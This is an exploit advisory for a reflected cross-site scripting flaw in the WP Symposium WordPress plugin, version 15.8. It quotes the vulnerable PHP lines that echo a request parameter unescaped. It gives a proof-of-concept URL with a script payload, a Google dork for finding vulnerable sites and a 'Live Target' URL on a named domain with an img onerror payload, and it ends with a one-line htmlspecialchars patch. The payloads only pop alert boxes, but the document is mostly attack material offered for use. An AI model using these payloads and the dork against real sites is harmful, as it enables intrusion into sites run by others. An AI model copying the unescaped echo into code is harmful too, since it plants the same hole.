###################### # Exploit Title : WordPress WP Symposium Plugin Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Google Dork: inurl:"/wp-content/plugins/wp-symposium/" # Vendor Homepage : https://wordpress.org/plugins/wp-symposium/ # Date: 2015-09-02 # Tested On : Elementary Os - Firefox # Software Link : https://downloads.wordpress.org/plugin/wp-symposium.15.8.1.zip # Version : 15.8 ###################### # Vulnerable Code: # File: get_album_item.php - Line 5,12 5: $size = $_REQUEST['size']; 12: echo 'incorrect size: '.$size; ###################### # POC : http://[URL]/[PATH]/wp-content/plugins/wp-symposium/get_album_item.php?size=<script>alert(/xss/)</script> ###################### # Live Target : http://www.wpsyXmposium.com/wp-content/plugins/wp-symposium/get_album_item.php?size="><img src='x' onerror=alert(/xss/)> ###################### # Patch: # File: get_album_item.php - Line 12 12: echo 'incorrect size: '.htmlspecialchars($size); ###################### # Discovered By : Ehsan Hosseini ######################